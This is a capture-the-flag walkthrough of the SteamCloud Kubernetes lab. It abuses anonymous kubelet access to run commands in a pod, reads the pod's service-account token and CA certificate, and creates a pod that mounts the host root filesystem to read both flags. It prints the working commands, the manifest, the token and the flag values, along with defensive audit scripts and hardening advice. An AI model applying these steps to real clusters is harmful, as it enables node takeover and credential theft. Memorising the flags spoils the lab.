SteamCloud: From Anonymous Kubelet Access to Pod Privilege Escalation, a Cloud-Native Attack and Defense Walkthrough

AI summary: This cloud-native penetration test exploits **anonymous Kubelet access** to escalate from an ordinary user Pod and ultimately obtain root on the host. The attack consists of reconnaissance, abusing unauthenticated Kubelet access, obtaining a service account token, creating a malicious Pod, and finally reading the flag.

Attacker IP: 10.10.16.3
Target IP: 10.10.11.133

Start with nmap:

nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.11.133

Result:

Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-13 09:34 CST
Nmap scan report for 10.10.11.133
Host is up (0.42s latency).
Not shown: 65528 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
2379/tcp  open  etcd-client
2380/tcp  open  etcd-server
8443/tcp  open  https-alt
10249/tcp open  unknown
10250/tcp open  unknown
10256/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 10.36 seconds

SSH is on its default port, 22. Etcd is a Kubernetes component: clients connect on port 2379 and peers on port 2380. The Kubelet is the Kubernetes node agent and listens on port 10250 by default, while the Kubernetes API server listens on 8443. Let me look at the Kubernetes API first, which is reachable on port 8443.

First, try the Kubernetes API server (port 8443) to check for unauthenticated access.
Requesting https://10.10.11.133:8443 returns a 403:

{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {
    
  },
  "status": "Failure",
  "message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
  "reason": "Forbidden",
  "details": {
    
  },
  "code": 403
}

The output shows that the root path cannot be read without authentication, so let's move on to the Kubelet service listening on port 10250.

curl https://10.10.11.133:10250/pods -k 
7a294e709eb13b941bde5f0f046feaafc31f540","started":true}],"qosClass":"Burstable"}},{"metadata":{"name":"nginx","namespace":"default","uid":"2e98a278-605a-4a8e-bbbd-f0e89d7613ef","resourceVersion":"494","creationTimestamp":"2025-09-13T01:30:02Z","annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"nginx\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"imagePullPolicy\":\"Never\",\"name\":\"nginx\",\"volumeMounts\":[{\"mountPath\":\"/root\",\"name\":\"flag\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/opt/flag\"},\"name\":\"flag\"}]}}\n","kubernetes.io/config.seen":"2025-09-12T21:30:02.317025326-04:00","kubernetes.io/config.source":"api"},"managedFields":[{"manager":"kubectl-client-side-apply","operation":"Update","apiVersion":"v1","time":"2025-09-13T01:30:02Z","fieldsType":"FieldsV1","fieldsV1":{"f:metadata":{"f:annotations":{".":{},"f:kubectl.kubernetes.io/last-applied-configuration":{}}},"f:spec":{"f:containers":{"k:{\"name\":\"nginx\"}":{".":{},"f:image":{},"f:imagePullPolicy":{},"f:name":{},"f:resources":{},"f:terminationMessagePath":{},"f:terminationMessagePolicy":{},"f:volumeMounts":{".":{},"k:{\"mountPath\":\"/root\"}":{".":{},"f:mountPath":{},"f:name":{}}}}},"f:dnsPolicy":{},"f:enableServiceLinks":{},"f:restartPolicy":{},"f:schedulerName":{},"f:securityContext":{},"f:terminationGracePeriodSeconds":{},"f:volumes":{".":{},"k:{\"name\":\"flag\"}":{".":{},"f:hostPath":{".":{},"f:path":{},"f:type":{}},"f:name":{}}}}}}]},"spec":{"volumes":[{"name":"flag","hostPath":{"path":"/opt/flag","type":""}},{"name":"kube-api-access-l7bhb","projected":{"sources":[{"serviceAccountToken":{"expirationSeconds":3607,"path":"token"}},{"configMap":{"name":"kube-root-ca.crt","items":[{"key":"ca.crt","path":"ca.crt"}]}},{"downwardAPI":{"items":[{"path":"namespace","fieldRef":{"apiVersion":"v1","fieldPath":"metadata.namespace"}}]}}],"defaultMode":420}}],"
containers":[{"name":"nginx","image":"nginx:1.14.2","resources":{},"volumeMounts":[{"name":"flag","mountPath":"/root"},{"name":"kube-api-access-l7bhb","readOnly":true,"mountPath":"/var/run/secrets/kubernetes.io/serviceaccount"}],"terminationMessagePath":"/dev/termination-log","terminationMessagePolicy":"File","imagePullPolicy":"Never"}],"restartPolicy":"Always","terminationGracePeriodSeconds":30,"dnsPolicy":"ClusterFirst","serviceAccountName":"default","serviceAccount":"default","nodeName":"steamcloud","securityContext":{},"schedulerName":"default-scheduler","tolerations":[{"key":"node.kubernetes.io/not-ready","operator":"Exists","effect":"NoExecute","tolerationSeconds":300},{"key":"node.kubernetes.io/unreachable","operator":"Exists","effect":"NoExecute","tolerationSeconds":300}],"priority":0,"enableServiceLinks":true,"preemptionPolicy":"PreemptLowerPriority"},"status":{"phase":"Running","conditions":[{"type":"Initialized","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:30:02Z"},{"type":"Ready","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:30:04Z"},{"type":"ContainersReady","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:30:04Z"},{"type":"PodScheduled","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:30:02Z"}],"hostIP":"10.10.11.133","podIP":"172.17.0.3","podIPs":[{"ip":"172.17.0.3"}],"startTime":"2025-09-13T01:30:02Z","containerStatuses":[{"name":"nginx","state":{"running":{"startedAt":"2025-09-13T01:30:03Z"}},"lastState":{},"ready":true,"restartCount":0,"image":"nginx:1.14.2","imageID":"docker-pullable://nginx@sha256:f7988fb6c02e0ce69257d9bd9cf37ae20a60f1df7563c3a2a6abe24160306b8d","containerID":"docker://7d2a2e576213a622800574845ccf5547c39e419f5dd54e9993373605bcfaf704","started":true}],"qosClass":"BestEffort"}}]}

Messy, right? But it is 2025 and I could not be bothered to read through it by hand, so I handed the dump to an AI to summarize. Its summary follows.

Cluster overview

Cluster type: Minikube single-node cluster
Node name: steamcloud
Node IP: 10.10.11.133
Kubernetes version: v1.22.3

Pod details

Core system components (kube-system namespace)

1. kube-controller-manager-steamcloud
Status: Running
Image: k8s.gcr.io/kube-controller-manager:v1.22.3
Restarts: 23
Resource requests: CPU 200m
Role: cluster controller manager (node controller, replication controller, and so on)
Key configuration:
Cluster CIDR: 10.244.0.0/16
Service CIDR: 10.96.0.0/12
All controllers enabled, including bootstrapsigner and tokencleaner

2. kube-scheduler-steamcloud
Status: Running
Image: k8s.gcr.io/kube-scheduler:v1.22.3
Restarts: 22
Resource requests: CPU 100m
Role: pod scheduler, assigns pods to suitable nodes

3. etcd-steamcloud
Status: Running
Image: k8s.gcr.io/etcd:3.5.0-0
Restarts: 0
Resource requests: CPU 100m, memory 100Mi
Role: cluster data store
Listening ports:
Client: 2379 (HTTPS)
Peer: 2380 (HTTPS)
Metrics: 2381 (HTTP)

4. kube-apiserver-steamcloud
Status: Running
Image: k8s.gcr.io/kube-apiserver:v1.22.3
Restarts: 0
Resource requests: CPU 250m
Role: Kubernetes API server
Listening port: 8443 (HTTPS)
Advertise address: 10.10.11.133:8443

Networking and storage components

5. kube-proxy-gb8zn
Status: Running
Image: k8s.gcr.io/kube-proxy:v1.22.3
Restarts: 0
Role: network proxy implementing Service load balancing
Deployed as: DaemonSet

6. coredns-78fcd69978-phvsw
Status: Running
Image: k8s.gcr.io/coredns/coredns:v1.8.4
Restarts: 0
Resources:
Requests: CPU 100m, memory 70Mi
Limits: memory 170Mi
Role: cluster DNS
Pod IP: 172.17.0.2

7. storage-provisioner
Status: Running
Image: gcr.io/k8s-minikube/storage-provisioner:v5
Restarts: 1
Role: Minikube storage provisioner

User workloads (default namespace)

8. nginx
Status: Running
Image: nginx:1.14.2
Restarts: 0
Pod IP: 172.17.0.3
Notable configuration:
Mounts host path /opt/flag at /root inside the container
Image pull policy: Never (uses a local image)

Network configuration

Pod network: 172.17.0.0/16 (Docker bridge network)
Cluster CIDR: 10.244.0.0/16
Service CIDR: 10.96.0.0/12
Host networking: most system components run with hostNetwork: true

Security configuration

Security context: all system components use the RuntimeDefault seccomp profile
Privileged containers: kube-proxy runs in privileged mode
Certificate management: certificates live under /var/lib/minikube/certs

Storage mounts

System components mount mainly the following directories:
Certificates: /var/lib/minikube/certs
CA certificates: /etc/ssl/certs, /etc/ca-certificates
Configuration: /etc/kubernetes/
etcd data: /var/lib/minikube/etcd

This is a typical single-node Minikube development cluster with every component on one node. The nginx pod's hostPath mount is the odd one out and suggests it was set up for a specific test or demo scenario.

Two details in that summary matter for what follows: the kubelet handed this whole list, including every pod's spec and volumes, to an unauthenticated client, and the only non-system pod (nginx, default namespace, service account default) mounts a hostPath from the node and automounts its service-account token.

We have pulled the full pod list from the cluster. The kubelet exposes several other, largely undocumented endpoints; rather than drive them by hand we can use kubeletctl to interact with it and find a way into a pod. Download the kubeletctl binary from the releases page:
https://github.com/cyberark/kubeletctl/releases
Install it (the asset name depends on your CPU architecture; the arm64 build is used here):

chmod +x kubeletctl_linux_arm64
mv kubeletctl_linux_arm64 /usr/local/bin/kubeletctl

List the pods:

kubeletctl --server 10.10.11.133 pods
POD NAMESPACE CONTAINERS 
1 kube-apiserver-steamcloud kube-system kube-apiserver
2 storage-provisioner kube-system storage-provisioner
3 kube-proxy-gb8zn kube-system kube-proxy
4 coredns-78fcd69978-phvsw kube-system coredns
5 nginx default nginx
6 kube-controller-manager-steamcloud kube-system kube-controller-manager
7 kube-scheduler-steamcloud kube-system kube-scheduler
8 etcd-steamcloud kube-system etcd

The complete pod list comes back without any credentials.
We already know nginx is the only pod in the default namespace and the only one that is not a Kubernetes system component. Because the kubelet accepts anonymous requests, its /run, /exec and /cri endpoints are reachable as well. /run takes a plain POST, but /exec needs an upgraded streaming connection (SPDY/WebSocket), which a plain curl request does not provide; kubeletctl handles that for us. Its scan rce command tries each pod and reports where command execution works:

kubeletctl --server 10.10.11.133 scan rce
Node with pods vulnerable to RCE

    NODE IP      PODS                               NAMESPACE   CONTAINERS              RCE
                                                                                        RUN

 1  10.10.11.133 coredns-78fcd69978-phvsw           kube-system coredns                 -

 2               nginx                              default     nginx                   +

 3               kube-controller-manager-steamcloud kube-system kube-controller-manager -

 4               kube-scheduler-steamcloud          kube-system kube-scheduler          -

 5               etcd-steamcloud                    kube-system etcd                    -

 6               kube-apiserver-steamcloud          kube-system kube-apiserver          -

 7               storage-provisioner                kube-system storage-provisioner     -

 8               kube-proxy-gb8zn                   kube-system kube-proxy              +

Command execution works on the nginx pod.
It also works on kube-proxy-gb8zn, a privileged system pod.
Since the scan shows we can run commands on the nginx pod, let's try id there.

┌──(root㉿kali)-[~]
└─# kubeletctl --server 10.10.11.133 exec "id" -p nginx -c nginx
uid=0(root) gid=0(root) groups=0(root)

The command runs as root inside the container, but there is no user flag in this pod.
More importantly, this confirms unauthenticated command execution through the kubelet API: the kubelet accepts anonymous requests and its authorizer lets them reach /exec.
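Before reaching for kubeletctl, a practitioner usually wants a quick, read-only check of whether a kubelet's secure port accepts anonymous clients at all, and what the answer implies about its configuration. The following script is an added example, not code from the original write-up or from kubeletctl: it sends unauthenticated GETs to /pods and /runningpods/ and maps the status code of /pods to the kubelet's authentication/authorization settings (a 200 means anonymous auth is on and authorization allowed the read; a 403 means the request was accepted as system:anonymous but denied by the authorizer; a 401 means anonymous authentication is disabled). The default host and port are those of the target in this write-up and are assumptions only; kubeletctl's scan rce goes one step further and tries to execute a command in each container.

```python
"""Probe a kubelet's secure port for anonymous access and interpret the answer.

Added example, not code from the original write-up or from kubeletctl. It sends
unauthenticated GETs to read-only kubelet endpoints and maps the HTTP status of
/pods to the authentication/authorization settings it implies. The default host
and port are those of the write-up's target and are assumptions only.
"""
import ssl
import urllib.error
import urllib.request

READ_ENDPOINTS = ("/pods", "/runningpods/")

# What each verdict means for the kubelet's configuration.
EXPLANATION = {
    "ANON_READ_ALLOWED": "anonymous auth is enabled and the authorizer let "
                         "system:anonymous read /pods (AlwaysAllow or permissive "
                         "RBAC); full pod specs, including mounted paths, are exposed",
    "ANON_DENIED_BY_AUTHZ": "anonymous auth is enabled (request was treated as "
                            "system:anonymous) but authorization denied it; other "
                            "endpoints may still be allowed, webhook authz decides "
                            "per path and verb",
    "ANON_AUTH_DISABLED": "authentication.anonymous.enabled is false; a client "
                          "certificate or bearer token is required",
    "UNREACHABLE": "no HTTP answer on this port",
    "UNEXPECTED": "status code outside the usual 200/401/403 set; inspect manually",
}


def probe_kubelet(host="10.10.11.133", port=10250, timeout=5):
    """Return {path: HTTP status} for unauthenticated GETs (-1 if no answer)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # kubelet serving certs are cluster-signed,
    ctx.verify_mode = ssl.CERT_NONE     # not trusted by the attacker's host
    results = {}
    for path in READ_ENDPOINTS:
        url = "https://%s:%d%s" % (host, port, path)
        req = urllib.request.Request(url, headers={"Accept": "application/json"})
        try:
            with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
                results[path] = resp.status
        except urllib.error.HTTPError as e:
            results[path] = e.code      # 401 and 403 are informative answers too
        except (urllib.error.URLError, OSError):
            results[path] = -1
    return results


def classify(status_by_path):
    """Turn the probe result into one of the EXPLANATION verdicts."""
    status = status_by_path.get("/pods", -1)
    return {200: "ANON_READ_ALLOWED", 403: "ANON_DENIED_BY_AUTHZ",
            401: "ANON_AUTH_DISABLED", -1: "UNREACHABLE"}.get(status, "UNEXPECTED")


if __name__ == "__main__":
    statuses = probe_kubelet()
    verdict = classify(statuses)
    print(statuses)
    print("%s: %s" % (verdict, EXPLANATION[verdict]))
```

The fix on the defending side is the pair of KubeletConfiguration settings this probe is really testing: authentication.anonymous.enabled set to false and authorization.mode set to Webhook, so that every request to port 10250 must carry credentials and is then authorized by the API server.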

Now that we can run commands in the nginx pod, let's check whether its service-account token and CA certificate are readable. With those we can talk to the API server as that service account and look for a way to higher privileges.

kubeletctl --server 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx

The token:

eyJhbGciOiJSUzI1NiIsImtpZCI6Imx2V1ZEMWpiZ2ZRLXREWFRKc05fTVJIa3RXazdMU1FuemY1MFFfMUhQZTQifQ.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.VfGeHD3WvImsUL4XfwKsRnv5aBvlMrfvK9cZojYWIAn5H_kw8E_ZWTkQMuZrI_BIPs4-louyrGcegvwm4l3a9y0C4HtfDPGoEWR1uVEurjcp1nerYI-tNoMrLSqNKffHs8F-y9TaLfx2Qd6OPAUHLkxE7WYpcDGkSw1GLfa9sao-bEj0uEZpjuMESAKT1GPLj6AIU7uBxtOgYWNJrTWIHpmuYS5I-msRm6-DlPSvgYM0cphvWAsY_6kSJcJkWE9NpYlkJYyRPMmN7Q6sc5Paps517-hobkchufXunOZi1Q1zmymqaemLR4e_5otiPht5fULEKZQQmP4vD65CoTuUYg
kubeletctl --server 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx

The CA certificate:

-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
a3ViZUNBMB4XDTIxMTEyOTEyMTY1NVoXDTMxMTEyODEyMTY1NVowFTETMBEGA1UE
AxMKbWluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOoa
YRSqoSUfHaMBK44xXLLuFXNELhJrC/9O0R2Gpt8DuBNIW5ve+mgNxbOLTofhgQ0M
HLPTTxnfZ5VaavDH2GHiFrtfUWD/g7HA8aXn7cOCNxdf1k7M0X0QjPRB3Ug2cID7
deqATtnjZaXTk0VUyUp5Tq3vmwhVkPXDtROc7QaTR/AUeR1oxO9+mPo3ry6S2xqG
VeeRhpK6Ma3FpJB3oN0Kz5e6areAOpBP5cVFd68/Np3aecCLrxf2Qdz/d9Bpisll
hnRBjBwFDdzQVeIJRKhSAhczDbKP64bNi2K1ZU95k5YkodSgXyZmmkfgYORyg99o
1pRrbLrfNk6DE5S9VSUCAwEAAaNhMF8wDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQW
MBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
BBSpRKCEKbVtRsYEGRwyaVeonBdMCjANBgkqhkiG9w0BAQsFAAOCAQEA0jqg5pUm
lt1jIeLkYT1E6C5xykW0X8mOWzmok17rSMA2GYISqdbRcw72aocvdGJ2Z78X/HyO
DGSCkKaFqJ9+tvt1tRCZZS3hiI+sp4Tru5FttsGy1bV5sa+w/+2mJJzTjBElMJ/+
9mGEdIpuHqZ15HHYeZ83SQWcj0H0lZGpSriHbfxAIlgRvtYBfnciP6Wgcy+YuU/D
xpCJgRAw0IUgK74EdYNZAkrWuSOA0Ua8KiKuhklyZv38Jib3FvAo4JrBXlSjW/R0
JWSyodQkEF60Xh7yd2lRFhtyE8J+h1HeTz4FpDJ7MuvfXfoXxSDQOYNQu09iFiMz
kf2eZIBNMp0TFg==
-----END CERTIFICATE-----

Token and certificate obtained.

We can use them with kubectl to find out what this account is allowed to do. Save the certificate to a file named ca.crt and export the token as an environment variable.
First save the certificate as ca.crt.
Then:
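The token is a JWT, so it is worth decoding its payload before using it: the Kubernetes-specific claims say which namespace, service account and pod it is bound to, and the exp claim says how long it stays valid (the projected volume in the pod spec above requests it with expirationSeconds 3607, and the kubelet refreshes the file, so re-read it from the pod if requests start failing). The script below is an added example, not code from the original write-up; it decodes the header and payload with the standard library only and does not verify the signature, since we do not hold the cluster's signing key. SAMPLE_TOKEN is constructed here with a dummy signature and made-up UIDs and is not the token shown above (whose header segment does decode to alg RS256).

```python
"""Inspect a stolen Kubernetes service-account token before using it.

Added example, not from the original write-up. Projected service-account tokens
are JWTs; decoding the payload (no signature check, we do not hold the key)
tells us which namespace, service account and pod the token is bound to and
when it expires. SAMPLE_TOKEN is constructed with a dummy signature; it is not
the token from the write-up.
"""
import base64
import json
import time


def _b64url_decode(segment):
    """JWT segments are base64url without padding; restore it before decoding."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def _b64url_encode(obj):
    """Inverse of the above, used only to build the constructed sample token."""
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_jwt(token):
    """Return (header, payload) dicts. The signature is NOT verified."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWT (expected 3 dot-separated parts)")
    header = json.loads(_b64url_decode(parts[0]))
    payload = json.loads(_b64url_decode(parts[1]))
    return header, payload


def describe_sa_token(token, now=None):
    """Summarise the Kubernetes-specific claims of a service-account JWT."""
    header, claims = decode_jwt(token)
    k8s = claims.get("kubernetes.io", {})
    now = time.time() if now is None else now
    exp = claims.get("exp")
    return {
        "alg": header.get("alg"),
        "kid": header.get("kid"),
        "issuer": claims.get("iss"),
        "subject": claims.get("sub"),
        "namespace": k8s.get("namespace"),
        "serviceaccount": (k8s.get("serviceaccount") or {}).get("name"),
        "bound_pod": (k8s.get("pod") or {}).get("name"),
        "audience": claims.get("aud"),
        "expires_in_s": None if exp is None else int(exp - now),
        "expired": exp is not None and exp <= now,
    }


# Constructed token shaped like the file at
# /var/run/secrets/kubernetes.io/serviceaccount/token in the nginx pod.
# Fixed issue time keeps the example reproducible; the signature is a dummy.
SAMPLE_ISSUED_AT = 1757725800
SAMPLE_TOKEN = ".".join([
    _b64url_encode({"alg": "RS256", "kid": "constructed-kid"}),
    _b64url_encode({
        "aud": ["https://kubernetes.default.svc.cluster.local"],
        "exp": SAMPLE_ISSUED_AT + 3607,   # matches expirationSeconds in the pod spec
        "iat": SAMPLE_ISSUED_AT,
        "nbf": SAMPLE_ISSUED_AT,
        "iss": "https://kubernetes.default.svc.cluster.local",
        "kubernetes.io": {
            "namespace": "default",
            "pod": {"name": "nginx", "uid": "constructed-pod-uid"},
            "serviceaccount": {"name": "default", "uid": "constructed-sa-uid"},
        },
        "sub": "system:serviceaccount:default:default",
    }),
    "ZHVtbXktc2lnbmF0dXJl",   # not a real RSA signature
])


if __name__ == "__main__":
    for key, value in describe_sa_token(SAMPLE_TOKEN).items():
        print("%-15s %s" % (key, value))
```

Run it on the real token by replacing SAMPLE_TOKEN with the contents of the token file; the subject field is the identity kubectl will act as, which is what auth can-i later evaluates.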

export token="eyJhbGciOiJSUzI1NiIsImtpZCI6Imx2V1ZEMWpiZ2ZRLXREWFRKc05fTVJIa3RXazdMU1FuemY1MFFfMUhQZTQifQ.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.VfGeHD3WvImsUL4XfwKsRnv5aBvlMrfvK9cZojYWIAn5H_kw8E_ZWTkQMuZrI_BIPs4-louyrGcegvwm4l3a9y0C4HtfDPGoEWR1uVEurjcp1nerYI-tNoMrLSqNKffHs8F-y9TaLfx2Qd6OPAUHLkxE7WYpcDGkSw1GLfa9sao-bEj0uEZpjuMESAKT1GPLj6AIU7uBxtOgYWNJrTWIHpmuYS5I-msRm6-DlPSvgYM0cphvWAsY_6kSJcJkWE9NpYlkJYyRPMmN7Q6sc5Paps517-hobkchufXunOZi1Q1zmymqaemLR4e_5otiPht5fULEKZQQmP4vD65CoTuUYg"

Then list the pods:

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          3h15m

The default service account evidently has some permissions, so let's enumerate all of them with auth can-i --list.

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 auth can-i --list
Resources                                       Non-Resource URLs                     Resource Names   Verbs
selfsubjectaccessreviews.authorization.k8s.io   []                                    []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                    []               [create]
pods                                            []                                    []               [get create list]
                                                [/.well-known/openid-configuration]   []               [get]
                                                [/api/*]                              []               [get]
                                                [/api]                                []               [get]
                                                [/apis/*]                             []               [get]
                                                [/apis]                               []               [get]
                                                [/healthz]                            []               [get]
                                                [/healthz]                            []               [get]
                                                [/livez]                              []               [get]
                                                [/livez]                              []               [get]
                                                [/openapi/*]                          []               [get]
                                                [/openapi]                            []               [get]
                                                [/openid/v1/jwks]                     []               [get]
                                                [/readyz]                             []               [get]
                                                [/readyz]                             []               [get]
                                                [/version/]                           []               [get]
                                                [/version/]                           []               [get]
                                                [/version]                            []               [get]
                                                [/version]                            []               [get]

We may get, list and create pods in the default namespace. Creating a pod is all we need: any pod we create can mount the node's filesystem through a hostPath volume. We reuse the nginx image that is already on the node. Save the following YAML as p.yaml.

apiVersion: v1
kind: Pod
metadata:
    name: nginxt
    namespace: default
spec:
    containers:
    - name: nginxt
      image: nginx:1.14.2
      volumeMounts:
      - mountPath: /root
        name: mount-root-into-mnt
    volumes:
    - name: mount-root-into-mnt
      hostPath:
        path: /
    automountServiceAccountToken: true
    hostNetwork: true

We use the same nginx image and mount the host's root filesystem at /root inside the container, so the node's files are reachable from the pod. Once it is created, we can run commands in it through kubeletctl exactly as before. Apply the manifest and check that the new pod is running.
Create the pod:
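Both the pod dump the kubelet returned earlier and the p.yaml manifest above are worth checking mechanically rather than by eye or by AI: the fields that turn "create pods" into "root on the node" are a short, fixed list (hostPath volumes, hostNetwork/hostPID/hostIPC, privileged containers, SYS_ADMIN, and an automounted service-account token). The script below is an added example, not code from the original write-up or from kubeletctl. It audits a v1 PodList (the JSON /pods returns) or a single pod manifest and rates each finding. SAMPLE_PODLIST is constructed to mirror the target's nginx and kube-proxy pods and is not real kubelet output; NGINXT_MANIFEST is the p.yaml above as a dict.

```python
"""Triage Kubernetes pod specs for node-compromise primitives.

Added example, not code from the original write-up or from kubeletctl. It reads
the PodList JSON the kubelet returns from /pods (or a single pod manifest) and
reports hostPath mounts, hostNetwork/hostPID/hostIPC, privileged containers and
mounted service-account tokens. SAMPLE_PODLIST and NGINXT_MANIFEST are
constructed to mirror the write-up's cluster; they are not real kubelet output.
"""
import json

SEVERITY_ORDER = ("INFO", "MEDIUM", "HIGH", "CRITICAL")

# Host directories whose exposure hands over node credentials or the whole node.
SENSITIVE_HOST_PATHS = (
    "/etc", "/root", "/home", "/var/lib/kubelet", "/var/lib/minikube",
    "/var/run/docker.sock", "/run/containerd",
)


def host_path_severity(path):
    """Rate a hostPath by what an attacker can reach through it."""
    if path == "/":
        return "CRITICAL"
    for prefix in SENSITIVE_HOST_PATHS:
        if path == prefix or path.startswith(prefix + "/"):
            return "CRITICAL"
    return "MEDIUM"  # any hostPath still crosses the container boundary


def audit_pod(pod):
    """Return (severity, message) findings for one Pod object (a dict)."""
    spec = pod.get("spec", {})
    meta = pod.get("metadata", {})
    name = "%s/%s" % (meta.get("namespace", "default"), meta.get("name", "?"))
    findings = []
    for flag in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(flag):
            findings.append(("HIGH", "%s: %s=true" % (name, flag)))
    host_paths = {v["name"]: v["hostPath"].get("path", "")
                  for v in spec.get("volumes", []) if "hostPath" in v}
    for c in spec.get("initContainers", []) + spec.get("containers", []):
        cname = "%s/%s" % (name, c.get("name", "?"))
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            findings.append(("CRITICAL", "%s: privileged container" % cname))
        caps = [x.upper() for x in ((sc.get("capabilities") or {}).get("add") or [])]
        if "SYS_ADMIN" in caps or "ALL" in caps:
            findings.append(("HIGH", "%s: adds capability %s" % (cname, ",".join(caps))))
        for vm in c.get("volumeMounts", []):
            hp = host_paths.get(vm.get("name"))
            if hp is not None:
                findings.append((host_path_severity(hp), "%s: hostPath %s mounted at %s"
                                 % (cname, hp, vm.get("mountPath"))))
    if spec.get("automountServiceAccountToken", True):   # Kubernetes default is true
        findings.append(("INFO", "%s: service account '%s' token mounted (usable against the API server)"
                         % (name, spec.get("serviceAccountName", "default"))))
    return findings


def triage_podlist(podlist_json):
    """Audit every pod in a kubelet /pods response (v1 PodList) or one Pod."""
    data = json.loads(podlist_json)
    items = data.get("items", []) if data.get("kind") == "PodList" else [data]
    return [f for pod in items for f in audit_pod(pod)]


def worst(findings):
    """Highest severity among the findings, or None if there are none."""
    if not findings:
        return None
    return max((sev for sev, _ in findings), key=SEVERITY_ORDER.index)


# Constructed sample shaped like the kubelet's /pods output on the target.
SAMPLE_PODLIST = json.dumps({
    "kind": "PodList", "apiVersion": "v1", "items": [
        {"metadata": {"name": "nginx", "namespace": "default"},
         "spec": {"serviceAccountName": "default",
                  "volumes": [{"name": "flag", "hostPath": {"path": "/opt/flag"}}],
                  "containers": [{"name": "nginx", "image": "nginx:1.14.2",
                                  "volumeMounts": [{"name": "flag", "mountPath": "/root"}]}]}},
        {"metadata": {"name": "kube-proxy-gb8zn", "namespace": "kube-system"},
         "spec": {"hostNetwork": True, "serviceAccountName": "kube-proxy",
                  "containers": [{"name": "kube-proxy", "image": "k8s.gcr.io/kube-proxy:v1.22.3",
                                  "securityContext": {"privileged": True}}]}},
    ]})

# The p.yaml manifest from the write-up, as a dict.
NGINXT_MANIFEST = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "nginxt", "namespace": "default"},
    "spec": {"hostNetwork": True, "automountServiceAccountToken": True,
             "volumes": [{"name": "mount-root-into-mnt", "hostPath": {"path": "/"}}],
             "containers": [{"name": "nginxt", "image": "nginx:1.14.2",
                             "volumeMounts": [{"name": "mount-root-into-mnt", "mountPath": "/root"}]}]},
}

if __name__ == "__main__":
    for sev, msg in triage_podlist(SAMPLE_PODLIST) + audit_pod(NGINXT_MANIFEST):
        print("[%s] %s" % (sev, msg))
```

Pipe the real output of curl -k https://10.10.11.133:10250/pods into triage_podlist to get the same list for the live cluster. On the defending side these are exactly the fields the Pod Security Standards baseline profile (or an admission policy) rejects; a default service account that may create pods is only harmless when such a policy is enforced in its namespace.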

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f p.yaml

Output:

pod/nginxt created

Check the pod status:

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods

Output:

NAME     READY   STATUS    RESTARTS   AGE
nginx    1/1     Running   0          3h22m
nginxt   1/1     Running   0          40s

Our pod is healthy and running. With the node's root filesystem mounted at /root we can read both the user and root flags.
User flag first:

kubeletctl --server 10.10.11.133 exec "cat /root/home/user/user.txt" -p nginxt -c nginxt

Result:

489c152799a8c5137b8c52e14cd15dc7

Now the root flag:

kubeletctl --server 10.10.11.133 exec "cat /root/root/root.txt" -p nginxt -c nginxt

Result:

ddcc95de0703cde46ef1366ca2ace120

And that's a wrap 🎉
